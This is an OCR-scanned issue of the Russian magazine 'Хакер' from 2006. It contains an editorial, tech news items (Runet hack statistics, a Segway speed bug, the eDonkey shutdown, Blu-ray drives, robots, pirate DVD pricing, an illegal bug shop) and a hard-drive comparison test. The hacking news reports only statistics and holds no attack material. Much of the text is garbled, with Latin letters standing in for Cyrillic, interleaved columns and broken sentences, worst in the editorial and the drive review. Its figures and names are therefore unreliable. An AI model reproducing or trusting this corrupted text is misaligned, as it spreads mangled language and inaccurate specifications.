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ІЧТІЮ 



Недавно нашел очень 1 

свой телескоп не даче, исследуя кратер ч. ПрцЧі?м „несена- ■ 

денно комету о ядром под килом^ ^ дь 9 шая ц я ^ кая . удивился, когда I 

чала принял за звезду 0 па раБОлической траектории пря 

I 

все свои изыскания на ЭТ У ™МУ- относилС я к таким вещам, как ■ 
Честно говоря, я всегда ■- --ар ОЕальное потепление. Но после изц 
конец света два раза в годил он н0 от простой мысли: а I 

чения этого сайта мне стзлс как то Р А если 23 октября I 

человеческой жизни, к которы ь - Еу д ешь сдавать сессию, 

свою ценность. Вот ты 9 У'^ешь отом. ^ что - п - №рить прия телю на 
куда поедешь кататься на д ^ Зем ле фиГ анет километровая 

день рождения. А через н едел У т п цент 2035 человечества, а в^ | 

комета, и за пари мини 70^5 деить мы Будем с товои в бом 

Ближайшие пару дірит'ь свой подарок. Зато сможешь 

покат*тьсяГвсе Т дчень высцо покро^т&Йт№ЯЦ®й ^ьда 

Но все же я искренне °ед„^ говорить, что 

^к^ета вне^апн^ивменила свою траекторию...", или *к счастью, 

главная вещь, весьма ^чнальна ,кс Нужн0 делат ь все сеи- 

так, чтобы не откладыв размышляя об этом, мы и делали 



Приятного чтения! 



пікИогг, гл. ред. Хакера 
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-» СТА ТИСТИКА ВЗЛОМА РУНЕТА 






1 1 сентября сайт зесигііѵІаЬ.ги сообщил о совместном с порталом 
2 опе-И запуске еженедельной сводки отчетов по взлому веб- 
серверов в рунете. В первом выпуске говорится о 172 известных 
взломах за текущую неделю, большинство из которых были со- 
вершены турецкими хакерами. Причем основная масса успешных 
атак были совершены на серваки под управлением І_іпих (37%) 
и РгееВЗЭ (58%). Тройка лидеров среди взломщиков выглядит 
так: Эепдезіг Теат (22 взлома), Веідіит зесигііу (21 взлом) и Веба 
(14 взломов). Авторы статистики обещают, что в будущем будут 
предоставляться не только цифры, но и аналитика, информация 
о методах и причинах взломов, данные о провайдерах, хостящих 
жертвах — и другие полезные сведения. 





і 

і 

і 





-> ЗАГНУТЫЙ 
СЕГВЕЙ 

В 2002 году компания Зедѵѵау предложила миру совершенно 
новый и, по ее словам, революционный способ передвижения 
— двухколесную повозку с рулем и мотором, ездок которой нахо- 
дится в стоячем положении, и, чтоб не упасть, он должен держать 
равновесие. Машинка стоимостью около 5-ти тысяч долларов 
понравилась богатеньким Чебурашкам, экстремалам и даже была 
взята на вооружение немецкой полиции. Несмотря на кажущуюся 

I хрупкость конструкции, Зедѵѵау заверила покупателей, что ездить 
на их новинке не опаснее, чем на велосипеде. Но недавно выяс- 
нилось, что это не совсем так. В последние месяцы участились 
случаи жалоб владельцев гаджета на травмы — за последний год 
пострадали, как минимум, 6 человек. Это не осталось без внима- 
ния американской комиссии по безопасности потребительских 

I продуктов, которая провела расследование и выяснила, что в ПО 
чудо-машинки содержится опасный баг. Когда тачка разгоняется 
до максимальной скорости, может случиться внезапное переклю- 
чение на задний ход, в результате чего водитель буквально улета- 
ет со своего места. Несмотря на то, что компания уже предложила 
решение этой проблемы, комиссия дала право всем владельцам 
скутера вернуть игрушку производителю и получить полную де- 
нежную компенсацию. 



* ПЛЕЕР-СПОРТСМЕН 



Очередной ѴѴаІктап от компании Зопу предназначен не просто для любителей музыки. Для 
всех, кто ведет активный образ жизни. В нем имеется масса специальных функций (счетчик 
шагов и калорий, секундомер, измеритель пройденного расстояния и так далее), а благода- 
ря тонкому и стильному алюминиевому корпусу он еще и водонепроницаем. На бегу тыкать 
в клавиши пальцем не очень-то и удобно, поэтому управлять можно посредством поворот- 
ного переключателя. Музыкальные функции не уступают спортивным. Поддержка форма- 
тов МРЗ, Аігас, а также поп-ЭВМ ѴѴМА и ААС и встроенный РМ-тюнер! Еще он оснащен 
фирменной функцией быстрой зарядки, а в комплект поставки входят наушники, чехол 
для ношения на руке и металлическая цепочка. Емкость памяти в различных моделях 
может достигать 2 Гб, размеры плеера невелики — 96,5x20x21 мм, а веситон всего 27 г. 
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Билайн' 

ж#н« «а *ричі ^ерр«в 



Тариф «Разговорный» 

с абонентской платой 

0,95 Р уб. 

на все местные зв онни 

9,95 ру«. 

исходящие гео России и в страны СНГ 

Подробности ® 799 00 66 



В-о-о-о-о-о-о-о-о-о-т 
такие разговоры! 




-> ВОТ ЭТО ПЛАТА! 



Если бы нѳ маньяки, готовые днями и ночами копаться в железе, вы- 
жимая из него еще парочку Ірз, то многим вендорам стало бы намно- 
го тяжелее жить на свете. Например, не будь энтузиастов, готовых 
на все ради скорости, компания Беаскек вряд ли бы выпустила плату 
ѴѴіпРазі РХ7900 ОЗ ТОН. В ее основе лежит графический процессор 
ОеРогсе 7900 ОЗ, обладающий 256-битным интерфейсом, 20 кон- 
вейерами и работающий с памятью СЮОВЗ. Кроме того, плату можно 
использовать в связке ЗІ_І. Форматы .264, МРЕО-2 и ѴѴМѴ (в том 
числе ѴѴМѴ НО) благодаря аппаратному декодеру воспроизводятся с 
минимальной нагрузкой на процессор. Кроме того, поддерживаются 
НО ОѴО, диски ВІи-гау и другие форматы с встроенной защитой НідІі- 
ЬапсІѵѵісШі ОідііаІ Сопіепі: Ргоіесііоп (НОСР). В комплект поставки 
платы входят две игры и программный ОѴО-плеер. 





-> ПРОЩАЙ, ОСЛИК! 

Ослику еЭопкеу настал трындец. Если ты зайдешь на сайт ЕсІопкеу. 
сот , то увидишь не яркие баннеры с предложением влиться в дружную 
тусовку качальщиков вареза, а мрачное объявление: «е0опкеу2000 
ІМеіѵѵогк больше не доступна. Помните, что если вы крадете музыку или 
фильмы, то вы нарушаете закон. Суды по всем штатам правят балом и 
легко сажаюттаких, как ты и я. И не думай, что ты анонимен, когда сли- 
ваешь пиратский софт. Вот он, твой ІР, так что не наглей, качай только 
легальный музон». Конечно, не отхорошей жизни авторы оставили 
такое воззвание — представители аудио/видео индустрии плотно сели 
файлообменным сетям нахвости пригрозили судебной расправой в 
случае неповиновения. Большинство р2р-хостеров, включая ВеагЗНаге, 
і2НиЬ, ѴѴіпМХ, Огокзіег, Кагаа, решили, что связываться с мультимедий- 
ными магнатами не стоит, и прикрыли лавочки. МеіаМасМпе (авторы 
еОопкеу) продержалась дольше всех и хотела даже легализировать 
свою деятельность, но номер не вышел, за что фирма поплатилась 
30-миллионным штрафом. Конечно, смерть вышеназванных р2р-сетей 
не искоренитявление полностью. Большинство юзеров сидиттеперь 
на еМиІе, закрыть который, благодаря системе Каб, большим боссам 
будет вряд ли под силу. Но как ни крути, Осликажалко. 



-> СИНИЕ ЛУЧИКИ 

Универсальность оптических приводов продолжает 
расти. Сегодня компания І_Ѳ представилаустройс- 
тво ѲВѴѴ-Н10Ы, которое поддерживает запись ВІи- 
гау со скоростью 4Х. Кроме того, он умеет работать с 
более старыми ОѴО, ОѴО+В, ОѴО+ВѴѴ, атакже ОѴО- 
ВАМ, не говоря уж о всех видах СО. Если ты запамя- 
товал, то знай, что диски ВІи-гау, имея один размер с 
СО, вмещают в себя до 25 Гб данных на однослойном 
носителе и до 50 Гб — на двухслойном. Достигает- 
ся это благодаря более коротким волнам (405 нм), 
нежели у красного лазера (650 нм), что позволяет 
сфокусировать пучок света с большей точностью. 
Новый привод способен записывать информацию 
со скоростью 4Х для формата ВО-В и 2Х для фор- 
матахВО-ВЕ (многократная запись). Привод имеет 
вид внутреннего резака и выкрашен в белый цвет. 
Его цена будет составлять около 19 тысяч рублей. 
Немало, конечно, зато перспективно. 
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Первая многопользовательская ролевая игра мирового уровня 

полностью на русском языке! 
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)МЭ N ѴѲЭ ІЛІ • $МЭ N ѴѲЭ ІЛІ *$МЭ N ѴѲЭ ІЛ 



-» МАЛЕНЬКИЙ 1 /ЕНВАТІМ 

Компания ѴегЬаііт сделала подарок будущим обладателям новейших камкоде- 
ров. Именно онаанонсирует носители тіпі 0\Ю-Р, но не простые, адвухслойные. 
Имея диаметр, равный всего лишь восьми сантиметрам, они могут вместить 
почти час видео или 2,6 Гб данных. Естественно, их можно использовать не 
только с камерами, ас любым поддерживающим этот стандарт оборудованием, 
но для видеосъемки у них есть огромный плюс: запись идет без прерывания 
— так бывает с двусторонними носителями. Каки все новые оптические диски 
компании, болванки тіпі 0\Ю-Р ОІ_ обладают защитным слоем ЗсгаІсН ѲиагсІ, 
который делает диски устойчивыми против царапин, загрязнений и сальных 
следов — например, отприкосновения пальцев. Міпі 0\Ю-Р ОІ_в индивидуальной 
упаковке будут стоить где-то 3,5 доллара, а упаковка из 5-ти штук достанется 
тебе долларов за восемнадцать. 




-> РАСПЫЛИТЕЛЬ БЕЗОПАСНОСТИ 



+ Т Т Т Т Т 



УСЧ-іл Чя 




«Граждане, храните деньги в сберегательной кассе», — вещал нам Остап Бендер. 
«Храните важную инфу не на компе, а в интернете», — говорят участники проекта 
СІеѵегзаІе. Конечно, не в том смысле, чтоб выкладывать в открытом виде номер 
кредитки на каком-нибудь тѵзііе.пагосі.ги . Парни предлагают воспользоваться 
совершенно новым видом защиты, при котором инфа, распыленная на несколь- 
ко тщательно зашифрованных частей, будет храниться сразу на нескольких 
серверах. Таким образом, даже если твой комп умрет в пожаре, или злой хакер 
взломаеттвой винч, то ты всегда будешь знать, что важные данные не пострада- 
ют. Идея была позаимствована авторами у криптографа Ада Шамира, который в 
1979 году опубликовал статью «Как разделять секрет» с описанием достоинств 
разделения информации на фрагменты и публикации их в свободном доступе. 
СІеѵегзаіе — это опенсорсный проект, поэтому специалисты предсказывают, что 
его популярность очень быстро будет расти, и со временем образуется единое 
распределенное хранилище информации, пригодное для использования как 
корпорациями, так и частными лицами. Причем пользователю не нужно бояться, 
что, если какой-нибудь из 11-ти доступных наданный моментсерверов накроет- 
ся, инфа будет потеряна. Технология СІеѵегзаіе допускает потерю 5-ти серваков 
с возможностью полного восстановления по 6-ти оставшимся. Похоже, у этой 
тулзы есть все шансы стать лучшим другом для тех, кто ценит приватность. 



ЦВЕТНОЙДУ 



Компьютер может заставить облениться человека, особенно если к нему 
подключить такое устройство, как пульт дистанционного управления І_одііесб 
Нагтопу 1000. Его главное отличие от своих предшественников заключается 
в наличие цветного дисплея с сенсорным управлением. Естественно, такое 
решение упрощает использование устройства и вкупе со стильным дизайном 
придаетему особый шарм. Бытовые девайсы контролируются через инфракрас- 
ный порт, но это подразумевает их прямую видимость. Лень вставать с дивана и 
идти в соседнюю комнату? Дополнительный аксессуар БодііесН Нагтопу ѴѴігеІезз 
Ехіепсіег использует технологию РР для управления устройствами в соседних 
от пульта помещениях. Пульт может взять контроль над 175 тысячами девайсов 
различных производителей — именно столько моделей содержится в базе 
данныхкомпании. Наверняка там будутитвои верные помощники по домашним 
развлечениям. Если у тебя есть друзья в Европе, то ты можешь отправить им 150 
евро и в конце осени ждать посылки с пультом. 
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рекламы. 





-» РУССКИЙ РОБОТ-ЗМЕЯ 



«Чѳм изобретать велосипед, лучше использовать идеи, которые 
реализовала природа», — подумали в Петербургском сту- 
денческом конструкторско-технологическом бюро при ЦНИИ 
робототехники и технической кибернетики. Тамошние студенты 
собрали прототип змеевидного робота. Рабочее название моде- 
ли — «Змеелок-1 ». 

На данный момент «Змеелок-1» состоит из 15-ти звеньев. Каждое 
звено обладает двумя степенями свободы, поэтому управляется 
двумя сервоприводами производства японской фирмы Нііес. На 
роботе установлена телекамера, передающая на пульт оператора 
цветное изображение в разрешении 640x480. 

Управление роботом организовано от ноутбука оператора по 
проводу через сот-порт. Как сказали студенты, подобный архаизм 
допустили только для снижения материальных затрат — бюджет 
проекта составил всего 50 тысяч рублей (без учета стоимости зар- 
плат сотрудников). В следующей модели робота — «Змеелок-2», 

— которая разрабатывается в данный момент, управление будет 
реализовано по защищенному радиоканалу. 

Питание в данный моменттакже реализовано по проводам от 
внешнего источника — 6 вольт на каждый сервопривод и 6 вольт на 
микроконтроллер. Телекамера питается от собственного аккуму- 
лятора. Но «Змеелок-2» будет независим от внешнего источника 
питания — он будет организован специальными аккумуляторами. 
Скорость передвижения робота на данный момент составляет 
0,5 м в секунду. 




> Змеелок-1 



-> 5ТЕАМРІІИК 15 І\І0Т ОЕАО 




> Настоящий паровой танк! 



Знаешь, что такое стимпанк?Таквот, есть реальные шансы появ- 
ления паровых «монстров» в нашей жизни благодаря аниматору 
И-Вей Хуану (І-ѴѴеі Ниапд). Этотпредприимчивый изобретатель 
решил воплотить паровой танк в реальности — хотя бы в игрушеч- 
ном масштабе. 

Свои творения изобретатель предпочитает делать, обращая 
внимание нефункциональные возможности техники, независимо 
оттого, насколько впечатляюще она будет выглядеть. Конечно, 
элегантной такую технику сделать непросто: внутри этих поде- 
лок приходится размещать не самые изящные элементы. Такие, 
например, кактопливный бак и котлы с кипящей водой, из которых 
выходит пар и давит на поршни, в результате чего происходит 
какое-то движение. 

В качестве горючего можно использовать многие вещества, но 
самым удобным И-Вей для с воих машин считаетспирт. Топлива 
хватает на время работы от пяти минут до получаса — в зависимо- 
сти от модели. 

Со своими необычными аппаратами И-Вей участвовал в фести- 
вале ВоЬоОатез-2006, откуда вернулся с наградами. Пока что 
эти аппараты не выпускаются серийно. Хуан говорит, что детали 
приходится подыскивать для каждой модели отдельно, и поэто- 
му о промышленном производстве речи не идет. Все стимботы 
работают на спирту. Главная их часть, конечно, не живое сердце, а 
паровой огнеупорный котел. 
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-> БИОТРАНЗИСТОР ИЗ 
ШПИНАТА 



Папаѳвский шпинаттѳпѳрь не только еда и мега-бустер, но и... тран- 
зистор! Причем биологический. Это установили ученые изунивер- 
ситета Огайо, которые создали первый в мире биотранзистор на 
основе молекулы хлорофиллового комплекса клеток шпината. 
Благодаря сканирующему электронному микроскопу ученым 
удалось изменять форму молекулы хлорофилла-А, конструируя из 
первичной молекулы четыре новых формы. Ученыеуверены, что из- 
мененные формы хлорофилла-А помогут больше узнать о развитии 
жизни и процессе фотосинтеза вообще. 

Использование измененных молекул в качестве ключей сможет 
значительно повлиять набудущие логические цепи и механические 
нанокомпьютеры. А это, в свою очередь, принесет ряд новых продук- 
тов в медицинскую отрасль и наноэлектронику. Ну и, естественно, не 
обойдет стороной и ПК, которые «зарядятся» хлорофиллом. 
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> Синхротрон ОіаплопсІ 



-> БАЛЛИСТИЧЕСКИЙ 
НАНОТРАНЗИСТОР 




> Баллистический транзистор под микроскопом 



Как сделать компьютеры быстрее? Один из способов 
— совершенствование базового кирпичика точной 
техники — транзистора. Так, применив революцион- 
ный подход ктранзисторам, ученые изуниверситета 
Рочестера объявили о создании баллистического 
транзистора (ВЭТ) — устройства, которое должно 
стать прибором нового поколения. 

В основе прибора — полупроводниковый материал, в 
котором электроны находятся в состоянии двумерно- 
го электронного газа. Внутри этого полупроводника 
электроны в таком состоянии движутся без столкнове- 
ний с атомами примесей, которые могли бы ухудшить 
работу транзистора. 

Предложенный вариантустройства должен выде- 
лять существенно меньше тепла и работать намного 
быстрее. Ведь в нем происходит непрерывный поток 
электронов, которые не останавливаются, как это про- 
исходит в обычных давно существующих транзисто- 
рах. Вдобавок ко всему можно сказать, что движение 
электронов вВЭТ будет если и не совсем бесплатным, 
то уж точно очень дешевым. 

Как говорятученые, баллистический транзистор 
позволит конструировать чипы, работающие натера- 
герцевых частотах уже через несколько лет. Представ- 
ляешь, насколько возрастет при этом производитель- 
ность компьютеров? 
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^ тедапеѵг 




> Лунный робот-ровер «Атлет» 



4 ЛУННЫЙ ПАУК 

От пауков паровых переходим к паукам космическим. Стало известно, что на этой неделе 
ЫА5А приступает к испытаниям ряда экспериментальных роботов и роверов в знаменитом 
аризонском кратере, атакже в местечке Синдер-Лейк(СіпсІег І_аке), отличающемся «лунным» 
ландшафтом. 

Среди новинок — робот-ровер «Атлет» (АТНІ_ЕТЕ). Эта паукообразная машина может высту- 
пать в качестве лунного грузовика, передвижной базы, топливозаправщика и геолога, и при 
этом данный проект еще будет развиваться. Разработан «Атлет» специалистами Лаборато- 
рии реактивного движения при участии инженеров и ученых из ряда исследовательских цен- 
тров ЫА5А, атакже университета Стэнфорда и фирмы Воеіпд. Шесть мощных ногаппарата 
заканчиваются колесами, каждое из которых имеет свой силовой привод и может поворачи- 
ваться в разные стороны. Роботе поперечником более 4-х метров умеет разгоняться до 10-ти 
километров в час, преодолевать подъем в 50 градусов на скальном грунте и в 25 — на мягком 
песке. Также для него не станет препятствием вертикальный уступ высотой в метр с лишним. 
Грузоподъемность нового робота равна 450 килограммам — это рекорд для машин такого 
рода. Причем конструкция «Атлета» предусматривает возможность стыковки двух или более 
таких машин в гигантские самоходные платформы — если космонавтам понадобится пере- 
везти что-то более внушительное. 
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-> ОБВАЛ ПИРА ТСКИХ ЦЕН 




Нелегкие времена настали для наших дорогих пиратов. И дело тут 
не в отделе «К», и не в антипиратских рейдах. Главными врагами 
распространителей пиратских дисков стали... продавцы лицен- 
зионных. Если ты не в курсе, то в этом году производители софта 
и честные продавцы решили дать ценовый бой пиратству, снизив 
цены налицензионные 0\Ю в 2,5 раза. В 2005 году средний диск 
стоил 350 рублей, сейчас — 60-150. Продажи боксов сразу возрос- 
ли втрое, и, понятное дело, это отразилось на пиратскихточках. 
Впрочем, долго пираты терпеть беспредел лицензионщиков не 
стали и последовали их примеру, снизив стоимость пиратских 0\Ю 
до 50-80 рублей. Причем падение цен продолжается, и, говорят, в 
октябре фильмы и игры на 0\Ю можно будет купить за тридцатник. 
Есть и другие причины такого скачка: многие пиратские точки 
просто завалены варезом, распродать который просто не успе- 
вают. Ктому же постоянное развитие домашних сетей, снижение 
цен на безлимитный доступ в инет напрямую влияет на количес- 
тво покупаемых дисков. Ведь во многих домашних сетях музыку, 
фильмы, игры можно скачать бесплатно, причем появляются они 
быстрее, чем у пиратов. Третьей причиной, которую выявили экс- 
перты, является рост продаж дорогой мультимедийной аппарату- 
ры, владельцы которой предпочитают смотреть на своих плазмах 
качественное кино, а не пиратскую экранку. Сейчас на пиратском 
и лецинзионном рынках идет настоящая ценовая война, победи- 
тель в которой будет только один — обычный юзер. 



-» ОХОТА НА ЖУКОВ 



Если ты насмотрелся фильмов про Джеймса Бонда и 
хочешь обзавестись соответствующей техникой, не 
обязательно для этого записываться в спецслужбы 
— достаточно зайти в интернет. Магазинов, торгую- 
щих «специфичным» товаром, в сети полно. Напри- 
мер, до недавнего времени в рунете активно работал 
е-шоп, продающий жучки, скрытые в бытовой технике. 
Хозяин изготовлял все сам из простых зіт-карт от мо- 
бильников. Чип вставлялся в какой-нибудь чайник или 
розетку-тройник, и, чтобы прослушать разговор, до- 
статочно было позвонить на номер встроенной симки. 
Почему я сказал «до недавнего времени»? Оказыва- 
ется, торговля таким товаром незаконна и наказуема 
сроком до 3-х лет. На сомнительный магазинчик обра- 
тил внимание отдел «К», сотрудник которого сделал 
контрольную закупку жучка стоимостью 10 килоруб- 
лей. В итоге предприниматель оказался на скамье 
подсудимых. Милиции удалось узнать, что за месяц 
умельцу удалось сплавить не меньше 10-ти жучков по 
100-400 баксов каждый. Подобный шоп в сети — дале- 
ко не единственный, и главное отличие поставляемых 
имижучковотсертифицированнойтехники втом, что 
они не подают звуковой сигнал или голосовое пре- 
дупреждение при включении прослушивания. Юзать 
такие девайсы могуттолько спецслужбы и охранные 
предприятия, но никак не простые смертные. 
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-» УНИВЕРСАЛЬНОЕ ПИТАНИЕ 



Как ты знаешь, производители ноутбуков делают для своих питом- 
цев разные, неподходящие к другим, адаптеры питания. Причины 
тому разные: есть и экономические, а есть и чисто технические, но 
нас интересуют не они, а выход из сложившейся ситуации. Им ста- 
нет новая серия универсальных адаптеров Орііта N В от компании 
РЗР. Для того чтобы они могли соединить практически любой ноут- 
бук с заветным источником питания, в комплект поставки включе- 
ны аж шесть разных насадок. Серия Орііта N13 включает модели 
N1365, N1390, N61200 питанием от сети переменного токаи модель 
N6 АіЛо с питанием от автомобильного прикуривателя. Максималь- 
ная мощность составляетбб, 90 или 120 Вт в зависимости от моде- 
ли, а выходное напряжение равно 19 В. Каждый комплект адапте- 
ров содержитсумку для хранения, универсальный кабель питания 
и шесть сменных насадок для различных моделей ноутбуков. 
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V Принтер - сканер - копир в одном устройстве 

Ѵ| Раздельные картръщт 

У Доступна* цена №ртр№#&* - эсш? 270 руб* 

Ѵ| На&орюртрид^-этіомиядо20% 

Т Г ]іи т : |' т ""! і."" : ! і ! д 7 ! а Т" ’Ѵ 

У Любът$$№чит№№ 

■ -5- й.і. .і.ь і ■:■■■■■ .іі. .і.і : Ь.,.. ----Ь і- іі.і. .і.і. -о— - .І!.. 





от всего Лондон 

2970 руб, ж 270 руб. ре 20 % 
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АНДРЕЙ КОСТРОІ 



Сколько 



отелей, это новые .жест 

■ИГАБАЙТНЫХ ВИНЧЕСТЕРА 

- -'1 ПРЕДСТАВЛЯЕТ СОБО 

пт ЯЕАѲАТЕ: ПРОФЕССИО- 

7200.10, ИСПОЛЬЗУЮ- 

ВИНЧЕСТЕР ПРОИЗ- 



ТЕСТИРОВАНИЕ ОГРОйіі 

ИТАК В НАШУ ТЕСТОВУЮ 

*мр ПИСКИ ЗАМ5УНѲ, КС 



СВЕЖЕНЬКИХ НАКОПИ. и 
ГИГАБАЙТ. ДВА 500-ГИГА 

— А ВТОРОЙ 
НАКОПИТЕЛЯ С . - 
ТЕРОВ ВАВВАСГЮА _ 
іп 500-ГИГ АБАЙТНЫИ 



ІЕРЕДНАЯ партия 

ЯНУЛИ НА ОГОНЕК И ДВА 
к ИЗ СЕМЕЙСТВА ВИНЧЕС 
КОМПАНИЮ ИМ СОСТАВ1/ 
іРПИТЬ ЛУЧШЕГО. 



Методика 

1 - Пиковую с 
Из буфера) 

П РИ ПОМОЩИ 

Окорость 
н ия/записи 

«« гиле ;~- 
Диагностики А ЮА32 
среднюю и 
Чтобы оі 



тестирования: 

Те1 ЬИНТеРФеЙСа(или 

время случайного до , 
программы НО ТасЬ 

последовательного и 

измерялась при помощи 
агк , входящей в 
■ Мы фикси 

минимальную скоро 

іенить производила 
использования, мы при, 
оі* 8 1 аг[и Р> Арр/ісаноп 

I пакегаРсма!к0 5 П . і,ѲѴѴГІ(е)из 

4 ' ^ ля последующих тести 

; а ^е ( ег. мы прогонял? 

одел ЯМИ доступа (| . пеа 

““"«ггг *“«э У „ гг 

Кр«« т„ го , 

измеряющий эфф 6 
токовыми данными. 

5 - На протяжении 
ся мониторинг темг 

Тетр И ф иксирова 

6 - Сдаваемый устр, 
отключенном вентил 

пых режимов работы 



случайного чте- 
компонѳнты 

состав программы 
ши максимальную, 
сть записи/чтения 

юность НЭП д ля пое _ 
применили пять д ИС 

ГУ " эт ' тоРега(е 
количество одновре ’ 

•^У харду 
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Нііасііі НО5723050КІЛ360 



Оеъ?М,Г Е :500 

Интерфейс., затазоо 
Скорость вращения, ОЕ/мин 
ОЕьем кэш-памяти, Ме : і 6 

Количество дисков: 5 
Количество головок: ю 

О^^Оржк-Э N0^: есть 
Р-ЭЗМеры, ММ: 101,6x25,4x146 
Масса, кг: о, 7 



ѴѴезіегп ОідйаІ ѴІГО5000Ѵ5 



Объем, Гб: 500 
Интерфейс: ЗАТА 300 
Скорость вращения, 1 
Объем кэш-памяти. 
Количество дисков: 4 
Количество головок 
Поддержка N00: есть 

Размеры, мм: іоі ,6x2 

Масса, кг: 0,6 



об/ мин: 7200 
.МБ: 16 



НіЧасЬі иополі 
нитные диски 
Б-эйтнапласт! 
него чтения ок 
НС'ЗООЫ. 

Для подключения 
ѴѴезІегп Оідіш/, уст; 
коннектор питания, 
что одновременное 
диск Нііасіті поддер> 
по умолчанию актив 
Для лучшей совмес 
МИ), и если у других 



-чті п-эьопителе маг- 
'ностью записи 1 00 гига- 
этому по скорости линеи- 
опередить лишь Затвипд 



.копит.*, ѵозооте ; 00- 

-нитные пластины 
Ѵ05000КЗ. Как следитьи., 
идентичные графики линейного 

цевайс относится к семейству 
ачен для профессионального 

Семейство ВЕ2 отличается по- 

(МВГО, защитой от 

гаІіопРеесІРогѵѵагб), 



' аНИЯ к жеотком У Диску НііасНі, как и 
навливаѳт не только стандартный 5АТА- 
и обычный тоіех. Кстати, не забудь 

иТ П0ЛЬЗ ° ВаНИе Недопус ™ м °- Жесткий 
' ает интерфейс ЗАТАЗОО, но на заводе 
руют интерфейс ЗАТА 150 (это 
имости со старыми ЗАТА-і 
хардов выбор интерфейса 
ыканием определенных контактов 

о помощью перемычки, т 

чать утилиту Нііасііі Реаіиге ТооІ, 

проводить смену интерфейса с ее 
іи винчестера использовались- 

нитные диски, поэтому для создания 500- 

Г2с?зГ ось5яискови10магнитнь - 

1 вагелкно НеГаТИВН ° ° Ка3алась на 

ательного и случайного чтения/записи, 

Доступанаименьшеевтесте. Результаты 

буфера смогли превзойти 
Зеадаіе. Чтобы компен 
и записи Нііасііі, пришг 

под типичные — 
косвенно потверждают: 

Зіагіир, Арріісаііоп I 
Зѳадаіе ЗТ3750640А8 
теста Рііе тііе, 

накопитель серьезно просел. Зато 

винчестером в Іпіеі Іотеіег, мс - 

особеннодля гшііітесііазігеат патте, 
магнитных дисков сделало этот наког 

рячих — максимально .„ 



При разработке ні 

пользовались маг 
плотности, что и у 
практически 

чтения. 

В отличие от Ш 
ВЕ2 (гаіеі ебіііоп) и 
применения в НАЮ- 

вышенным временем наработки на 

вибрации (технология ВАРЕ, Воіагу 

оптимизацией микропрограммы для 

массива. Как следствие, он более 

относительно семейства ЗЕ1 6. Ода 
I действованные при изготовлении 
сказались на результатах скор 
чтения/записи и времени случаинс 
I запись практически идентичны^ 

1 правда, пиковая скорость интерф< 

I микропрограмма ѴѴ05000УЗ не тр. 

I дачи, производительность которь 

I на практике мы получили резулы 
1 теЛ ям Ѵ\ГО5000К5. Тестируемый н: 

1 \АГО5000КЗ в тесте с использовані 
Я странно, учитывая спектр его прі 

■ .„оьхьмм писком, был на уровне 



сделано 
-контроллера- 
1 осуществля- 
технологичѳского 
то для накопителей НііасНі 
делать загрузочную 
помощью. При из- 
100- гигабайтные маг- 
>-гигабайтного девай- 
Невысокая 
скорости последо- 
зато время случайно- 

скорости чтения из 
только жесткие диски производства 
ровать невысокие скорости чтения 
Ь оптимизировать йгглѵѵаге девайса 

задачи сіезкіор-систем, и данные Рс« “ I 
7 -Г ^тестиРУемый хард победил в тестах хр 
оабтд и ѲепегаІ Озаде. Немного уступил 
■ -о В тесте Ѵігиз Зсап. Лишь по результатам 
который критичен к скорости чтения/записи, 

результаты, показанные 
можно смело считать неѵп аии 



/ 017 



ХАКЕР 10 /94/ 06 
















• •• 

0БЪ*М, Г Б: 300 

Интерфейс'- зата зоо 

Скорость вращения об/ мин: 7200 
Овьем кэш-памяти, Ме: 8 
Количество дисков: 3 
Количество головок: 6 
Поддержка N00: есть 
Размеры, ММ: 102x25x146 
Масса, кг: 0,653 






••• • • • • • оо 

Овьем, Г Б: 400 
Интерфейс: зата зоо 

0Бье?^ Ь Вращени я, ов/мин: 7200 

-іБъем кэш-памяти. Мб: 8 
Количество дисков: з 
Количество головок,- 6 
Поддержка N00: есть 
Размеры, ММ: 102x25x146 

Масса,кг.-о,бб 






— ' ~==г=Г = 

Затзипд равнялась ^ ппоизводство жестких 

ным КОН ^ реН ™з 0 У 0 й 40° С и Ь 5 00^игабайт. Однако с появлением 
дисков объемом 300,^ 335 с ПЛОТ ностью записи 1 33 

| ЛИНеЙ ^ НаК0 Т и Гзатзипд удалось пополнить свой модель- 
гигабайта на диск За 9 гига байт, сократив 

ныйряднакопѵпвпямиемкос^^и^ 

технологическое отставание техничес- 

НРЗООЫ не так прост, как каж ^ чтопри изготовлении 

кие характеристики, можно о Н х дискаи6 ГОЛ овок, но 

гермоблока использовались Зм Д ^ ^ гигабайт . 

в этом случае объем девайса до^^^ установлен ы диски с 

Объяснение банально. байт и ОМ В-головки (на основе ги- 

плотностью записи 1 0 ог+лг н Р кта , > вместо ТМН-голо- 

гантского магниторезистивного^^торезистив^ого эффекта), 
вок (на основе туннель й Скоро сть последо- 

что подтверждают результатъ тестируемого вин- 

вательного и СЛуЧаЙ ^° Г ° 2ТчТмуНІШсбіН03725050іаА360, 

меотераоказаласьч^ьн пласт ины. Время 

который тоже исполь у большинства учас- 

случайного доступа заметно выш, У ельн0 сть 

жесткого диска в нота ПО мощью РИе зегѵег 

„М,ПЬК,.Т«».Р»^“»"Р”'” ,45фаЯ,С ° | 



. ПЛО ТНОС . 

Н0400Ы „око эть . " р “« 

линейного чтения результат скорости 

™»ь,с™„ от „ запи ^^ 
положительно сказало^ иа И МЯ " головк и, что 

случайного чтения по оД Р °° ТИ ПОСЛе « ов ^ельного и 
Ренно занял второе месТлишГ' К0Т ° Р0Г ° І ВИНЧѲСТеР: ^ 
играв более совершенному ЗеадаДГз^оГДп™ ПР °' 

ступа, разочаоовали ИЗМѲрЯЮЩего в Р®мя случайного до- 
девайс очутился на после КЭК ° П ° Ка3аТеЛеМ ВРеМеНИ 1 5 ' 4тз 
Фера 1 78 Мб в секунд ѵ не П ДНеМ МеСТе СК ° Р0СТЬ ЧТѲНИЯ из бу ' 

: ля, работающего по интерфДДУзДмзш'р^^Г" 0 ™ 1 "' 
значения на ѵппрмо У А300. РстагкОб выдал 

і мальным преимуществом ппл с? ега| и8а 9 е 0 мини- 

“Га™Г7ГрГ/ тѳ 7 га Гла -“"« : 

победил за счет более вв Заглзип 9 Н0400Ы 

Результат СК ° Р ° С ™ '™*я и записи, 

Затзипд ШЗООЫ ноппои^ ° теІѲГ прак ™чѳски совпал о 

в итоге ДазДДіД ДИТеЛЬН0СТЬти,(ітес)іаз ^ат 

пература ная тем- 

активной работы несколько «к ’ УР шума во в Ремя 

винчестер уступает новы ' Р ° С ’ И П0 ЭТ0М У параметру 
н уь упаѳт новым моделям ѴѴеяГрт піп.Чоі 

ДУШим поколениям винчестеров Затзипд. " ПРеДЬ " 
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ОБЪ-ем,ГБ:750 

Интер Ф ейс:ЗАТАЗОО 7200 

Скорость вращения,-- 
